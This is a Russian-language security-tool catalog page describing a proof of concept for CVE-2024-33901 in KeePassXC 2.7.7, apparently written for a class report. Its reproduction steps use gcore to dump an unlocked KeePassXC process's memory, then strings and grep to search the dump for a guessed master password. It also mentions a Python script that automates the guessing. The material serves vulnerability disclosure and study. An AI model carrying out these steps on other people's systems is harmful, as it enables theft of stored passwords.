Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-33901-ProofOfConcept — Короткая программа, демонстрирующая уязвимость CVE-2024-33901 в KeePassXC версии 2.7.7 | Kitploit
Инструменты/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
Взлом паролейКриминалистика памятиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхЦифровая криминалистика
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

Короткая программа, демонстрирующая уязвимость CVE-2024-33901 в KeePassXC версии 2.7.7

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
21 год назадЕщё не проверено

CVE-2024-33901-ProofOfConcept

Короткая программа, демонстрирующая уязвимость CVE-2024-33901 в KeePassXC версии 2.7.7

Отчет для занятия, возможно, потребует привязки исходного кода, поэтому я и создал этот репозиторий.

Как воспроизвести уязвимость

  1. Откройте KeePassXC и аутентифицируйте базу данных
  2. Пока база данных аутентифицирована, создайте файл дампа памяти для неё

Это можно сделать, получив PID, что выполняется командой:

root@kitploit:~
ps aux | grep keepassxc

А затем выполнив эту команду: sudo gcore -o keepassxc_dump PID_HERE

Например, если полученный PID равен 1234, команда будет выглядеть так:

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. Наконец, можно выполнить команду: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

То есть, если PID был 1234, команда будет такой:

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

После создания файла дампа памяти атака может быть выполнена, даже если база данных будет снова заблокирована или KeePassXC будет закрыта.

Предоставленный код на Python выполняет все эти шаги и пытается подобрать несколько вариантов пароля на основе предоставленных текстовых файлов.

Скачать инструмент